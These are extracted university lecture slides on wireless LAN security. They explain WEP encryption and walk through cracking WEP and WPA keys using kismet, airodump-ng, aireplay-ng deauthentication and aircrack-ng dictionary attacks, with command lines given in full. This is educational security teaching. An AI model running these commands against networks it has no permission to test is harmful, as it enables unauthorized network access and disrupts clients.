Download - WLAN Security: Cracking WEP/WPA
1
WLAN Security:Cracking WEP/WPA
รศ. ดร. อนันต์ ผลเพิม่Assoc. Prof. Anan Phonphoem, Ph.D.
[email protected]://www.cpe.ku.ac.th/~anan
Computer Engineering DepartmentKasetsart University, Bangkok, Thailand
Wireless LANs2011
WEP Block Diagram
2
WEP Frame
IntegrityAlgorithm(CRC-32)
Pseudo-RandomNumber Generator
RC-4
+
BitwiseXOR
Plain Text
Cipher Text
Integrity CheckValue (ICV)
Key Sequence
Secret Key (40-bit or 128-bit)
InitializationVector (IV)
IV
Encryption BlockSender Site
IntegrityAlgorithm
Pseudo-RandomNumber Generator
BitwiseXOR
Cipher TextPlain Text
Integrity CheckValue (ICV)
Key Sequence
IV
Secret Key (40-bit or 128-bit)
Decryption BlockReceiver Site
3
WEP – Encoding
IntegrityAlgorithm(CRC-32)
Pseudo-RandomNumber Generator
RC-4
+
BitwiseXOR
Plain Text
Cipher Text
Integrity CheckValue (ICV)
Key Sequence
Secret Key (40-bit or 128-bit)
InitializationVector (IV)
IV
4
WEP Frame
Frame Header
IV Header Frame Body ICV
Trailer FCS
EncryptedClear Text Clear Text
4 bytes
4 bytes
5
WEP – Decryption
IntegrityAlgorithm
Pseudo-RandomNumber Generator
BitwiseXORCipher Text
Plain Text
Integrity CheckValue (ICV)
Key Sequence
IV
Secret Key (40-bit or 128-bit)
Cracking WEP
6
7
Cracking Steps1) Reconnaissance (Collect target info.)
[kismet]2) Run promiscuous mode [iwconfig,
airmon]3) Collect data [airodump]4) Crack key [aircrack]
8
Default SSIDs
9
1) Reconnaissance (Collect target info.)
10
Kismet (Reconnaissance)
11
Kismet (AP Info.)
12
Kismet (Client Info.)
13
2) Run promiscuous mode
14
1 2
3 4
Regular Behavior
Station 1 transmits to all (broadcast)
15
1 2
3 4
Intention to Eavesdrop
Promiscuousmode
Station 1 transmits to station 4
16
iwconfig
iwlist
17
Promiscuous Mode Setup
• By using iwconfig
18
Promiscuous Mode Setup
• By using airmon-ng
19
Promiscuous Mode Setup
20
21
3) Collect data
22
airodumpFrom Kismet
Airodump problemroot@APMoose:~/toulouse# airodump-ng mon0ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
/dev/rfkill is “Linux ‘s Subsystem kernel for controlling radio transmisster (activated/deactivated)”
anan@APMoose:~$ rfkill list0: phy0: Wireless LAN
Soft blocked: no software can reactivateHard blocked: no software cannot reactivate
1: acer-wireless: Wireless LANSoft blocked: noHard blocked: no
2: acer-bluetooth: BluetoothSoft blocked: noHard blocked: no
4: hci0: BluetoothSoft blocked: noHard blocked: no
Solve by:root@APMoose:~/toulouse# rfkill unblock all
23
24
airodump
25
airodump data files
26
4) Crack Key
aircrack• For non-encryption
27
28
aircrack
29
WEP Cracking Demo
Cracking WPA
30
Cracking Steps1)Start the wireless interface in monitor
mode on the specific AP channel2)Start airodump-ng on AP channel with
filter for bssid to collect authentication handshake
3)Use aireplay-ng to deauthenticate the wireless client
4)Run aircrack-ng to crack the pre-shared key using the authentication handshake
31http://www.aircrack-ng.org/doku.php?id=cracking_wpa
32
1) Start Monitoring Mode
Check interface
33
iwconfig
34
Start monitoring mode
35
36
2) Start airodump-ngcollect authentication handshake
Start airodump-ng
37
Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0
Parameter Description-c 6 Wireless channel--bssid 00:1E:F7:xx:xx:xx
AP’s MAC
-w psk File name prefix (contain Ivs)mon0 Interface name
Start airodump-ng less parameter
38
Moose# airodump-ng -w psk mon0
39
3) Deauthenticate client
aireplay
40
Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0
Parameter Description-0 deauthentication1 # deauthentication sent-a 00:12:01:xx:xx:xx AP’s MAC -c 00:23:11:xx:xx:xx Deauthing client’s MAC-mon0 Interface name
41
4) Crack
Need a dictionary
42
Moose# aircrack-ng –b 00:12:01:xx:xx:xx -psk*.cap
With dictionary
43
Moose# aircrack-ng -w password.lst -psk*.cap
Handshake found
44http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Successfully Crack
45http://www.aircrack-ng.org/doku.php?id=cracking_wpa